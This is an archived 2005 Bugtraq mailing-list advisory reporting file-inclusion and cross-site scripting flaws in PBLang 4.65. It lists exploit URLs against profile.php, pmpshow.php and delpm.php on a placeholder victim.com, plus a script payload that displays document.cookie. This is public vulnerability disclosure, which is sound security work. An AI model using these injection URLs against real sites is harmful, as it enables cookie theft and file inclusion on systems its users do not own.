[40934] in bugtraq


home	help	back	first	fref	pref	prev	next	nref	lref	last	post

File Including In PBLang

daemon@ATHENA.MIT.EDU (abducter_minds@yahoo.com)
Fri Oct 28 17:46:02 2005

Date: 27 Oct 2005 11:57:24 -0000
Message-ID: <20051027115724.25722.qmail@securityfocus.com>
Content-Type: text/plain
Content-Disposition: inline
Content-Transfer-Encoding: binary
MIME-Version: 1.0
From: abducter_minds@yahoo.com
To: bugtraq@securityfocus.com


Class:  Input Validation Error  
CVE:  CVE-MAP-NOMATCH  
Remote:  Yes  
Local:  Yes  
Credit:  Abducter (ABDUCTER_MINDS@YAHOO.COM) Or (ABDUCTER_MINDS76@HOTMAIL.COM)
Vulnerable:  File Including In PBLang 4.65 (ALL VERSION)
* info *
PBLang IS POWER PHP SITES SUPPORT HERE
http://pblang.drmartinus.de/

* expliot *
http://www.victim.com/profile.php?u=[abducter here]
http://www.victim.com/pmpshow.php?num=[abducter here]
http://www.victim.com/delpm.php?id=[abducter here]

u can do xss in any expliot as this 
http://www.victim.com/pmpshow.php?num=<script>JavaScript:alert(document.cookie);</script>

* credit *
         Devil-00
         Security4Arab .. A'Where Home .. WE LOVE S4A FOR EVER :P
         HACKERS PAL ..
         WwW.S4a.Cc
         MY LOVE (N0N0)


home	help	back	first	fref	pref	prev	next	nref	lref	last	post

[40934] in bugtraq

File Including In PBLang

daemon@ATHENA.MIT.EDU (abducter_minds@yahoo.com)Fri Oct 28 17:46:02 2005

daemon@ATHENA.MIT.EDU (abducter_minds@yahoo.com)
Fri Oct 28 17:46:02 2005